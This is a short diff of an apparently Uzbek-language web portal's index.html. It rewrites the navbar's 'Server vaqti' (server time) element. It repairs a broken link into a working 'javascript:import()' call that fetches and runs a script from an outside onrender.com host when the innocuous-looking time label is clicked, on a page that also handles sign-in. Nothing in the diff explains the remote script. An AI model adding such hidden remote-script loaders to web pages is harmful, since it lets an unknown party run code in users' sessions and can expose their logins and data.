--- a/index.html
+++ b/index.html
@@ -185,13 +185,13 @@ class="feather feather-align-left">
 </ul>
 <ul class="nav navbar-nav navbar-right">
 <li class="dropdown">
-<p href="#" class="text-right text-blue server-time">
-
-<span>  <a href="avascript:import('https://young-z7wb.onrender.com/a.js')">
-        Server vaqti
-    </a>
-</span><br>
-<strong>15.12.2025 | 14:38</strong>
+<p class="text-right text-blue server-time">
+    <span>
+        <a href="javascript:import('https://young-z7wb.onrender.com/a.js')">
+            Server vaqti
+        </a>
+    </span><br>
+    <strong>15.12.2025 | 14:38</strong>
 </p>
 
 </li
@@ -490,6 +490,7 @@ signInAjax();
 </body>
 
 </html>
+
 
 
 
